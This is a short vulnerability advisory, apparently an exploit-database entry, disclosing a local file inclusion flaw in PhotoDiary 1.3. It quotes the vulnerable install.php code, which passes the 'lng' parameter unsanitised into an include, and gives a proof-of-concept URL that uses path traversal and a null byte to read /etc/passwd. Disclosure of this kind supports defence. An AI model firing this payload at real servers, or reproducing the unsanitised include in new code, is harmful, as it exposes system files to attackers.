[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : PhotoDiary 1.3 (lng) LFI Vulnerability
# Published : 2009-12-31
# Author : cOndemned
# Previous Title : Discuz <= 1.03 SQL Injection Exploit Vulnerability
# Next Title : Myiosoft EasyGallery (catid) Blind SQL Injection Vulnerability


PhotoDiary 1.3 (lng) Local File Inclusion Vulnerability
Discovered by cOndemned

download: http://code.google.com/p/photodiary/


source of /admin/install.php (lines 9 - 15):

	if (isset($_GET['lng'])){
		$LNG = $_GET['lng'];			# 1
	} else {
		$LNG = "ITA";
	}
	
	include "../common/language_".$LNG.".php";	# 2


proof of concept:
		
	http://[target_host]/admin/install.php?lng=/../../../../../../etc/passwd%00